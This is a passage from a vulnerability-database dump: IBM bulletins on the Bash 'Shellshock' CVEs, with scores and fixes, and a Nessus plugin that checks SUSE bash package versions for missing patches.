[_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nTSSC 7.x and 5.x\n\n## Remediation/Fixes\n\nIf you are at level 7.x of the TSSC, update to TSSC 7.3.17. If you are at level 5.x, install the patch 5.12.8_shellshock. Contact IBM support to obtain fix.\n\n## Workarounds and Mitigations\n\nNo known workarounds. TSSC should be updated to the appropriate fix level.. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n\u00b7 30 September 2014 Original bulletin created \n\u00b7 27 October 2014 Added patch for TSSC 5.12 \n\u00b7 05 December 2014 Updated the bulletin \n\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"STFS69\",\"label\":\"TS7700\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"TSSC\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"N\\/A\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}] \n\n## Product Synonym\n\nTS7720;TS7740;TS7700;TS3500;TS4500;TS7650;TS7680;3592-C07;3592-C08", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:08:41", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect TSSC (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-18T00:08:41", "id": "BFA15D43F646FFC5AFD437B2E4A088CDA943E32237DE20B421F42A372083D616", "href": "https://www.ibm.com/support/pages/node/690007", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:13:28", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM InfoSphere Guardium Database Activity Monitoring.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM InfoSphere Guardium Database Activity Monitoring versions 8.2, 9.0, 9.1 both 32bit and 64bit \n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nIBM InfoSphere Guardium Database Activity Monitoring| 8.2| \n| [_http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-8.2p242_Advisories_2209_2230&includeSupersedes=0&source=fc_](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-8.2p242_Advisories_2209_2230&includeSupersedes=0&source=fc>) \nIBM InfoSphere Guardium Database Activity Monitoring| 9.x 32bit and 64bit| \n| [_http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-9.0p1061_Advisories_2209_2230&includeSupersedes=0&source=fc_](<http://www.ibm.com/support/fixcentral/swg/quickorder?product=ibm/Information+Management/InfoSphere+Guardium&release=All&platform=All&function=fixId&fixids=SqlGuard-9.0p1061_Advisories_2209_2230&includeSupersedes=0&source=fc>) \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\nCVSS Guide -<http://www.first.org/cvss/v2/guide> \n[__On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/psirt>) \n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n30 September 2014\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSMPHH\",\"label\":\"IBM Security Guardium\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.1;9.0;8.2\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-16T10:15:46", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM InfoSphere Guardium Database Activity Monitoring (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-07-16T10:15:46", "id": "6BED381F0625A1CEE6FF30731B3F37C8E1BC1D95ED40906A48FF91875BFEA753", "href": "https://www.ibm.com/support/pages/node/252275", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:39:05", "description": "This update for bash fixes the following issues :\n\n - CVE-2016-7543: Local attackers could have executed arbitrary commands via specially crafted SHELLOPTS+PS4 variables (bsc#1001299)\n\n - CVE-2016-0634: Malicious hostnames could have allowed arbitrary command execution when $HOSTNAME was expanded in the prompt (bsc#1000396)\n\n - CVE-2014-6277: More troubles with functions (bsc#898812, bsc#1001759)\n\n - CVE-2014-6278: Code execution after original 6271 fix (bsc#898884)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-23T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : bash (SUSE-SU-2016:2872-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278", "CVE-2016-0634", "CVE-2016-7543"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bash", "p-cpe:/a:novell:suse_linux:bash-debuginfo", "p-cpe:/a:novell:suse_linux:bash-debugsource", "p-cpe:/a:novell:suse_linux:libreadline6", "p-cpe:/a:novell:suse_linux:libreadline6-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-2872-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95282", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2872-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95282);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\", \"CVE-2016-0634\", \"CVE-2016-7543\");\n script_bugtraq_id(70165, 70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : bash (SUSE-SU-2016:2872-1) (Shellshock)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bash fixes the following issues :\n\n - CVE-2016-7543: Local attackers could have executed\n arbitrary commands via specially crafted SHELLOPTS+PS4\n variables (bsc#1001299)\n\n - CVE-2016-0634: Malicious hostnames could have allowed\n arbitrary command execution when $HOSTNAME was expanded\n in the prompt (bsc#1000396)\n\n - CVE-2014-6277: More troubles with functions (bsc#898812,\n bsc#1001759)\n\n - CVE-2014-6278: Code execution after original 6271 fix\n (bsc#898884)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1000396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1001299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1001759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=898812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=898884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6277/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6278/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0634/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7543/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162872-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c2ca2949\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1:zypper in -t patch\nSUSE-SLE-WE-12-SP1-2016-1681=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2016-1681=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1681=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1681=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bash-4.2-82.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bash-debuginfo-4.2-82.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bash-debugsource-4.2-82.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libreadline6-6.2-82.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libreadline6-debuginfo-6.2-82.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libreadline6-32bit-6.2-82.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libreadline6-debuginfo-32bit-6.2-82.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"bash-4.2-82.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2-82.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"bash-debugsource-4.2-82.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-82.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libreadline6-6.2-82.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-82.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-6.2-82.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:56:02", "description": "This update for bash fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2016-7543: A code execution possibility via SHELLOPTS+PS4 variable was fixed (bsc#1001299)\n\nCVE-2016-0634: Arbitrary code execution via malicious hostname was fixed (bsc#1000396)\n\nNon-security issues fixed: Fix repeating self-calling of traps due the combination of a non-interactive shell, a trap handler for SIGINT, an external process in the trap handler, and a SIGINT within the trap after the external process runs. (bsc#1086247)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-22T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : bash (SUSE-SU-2018:1398-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543"], "modified": "2022-02-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bash", "p-cpe:/a:novell:suse_linux:bash-debuginfo", "p-cpe:/a:novell:suse_linux:bash-debugsource", "p-cpe:/a:novell:suse_linux:libreadline6", "p-cpe:/a:novell:suse_linux:libreadline6-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": 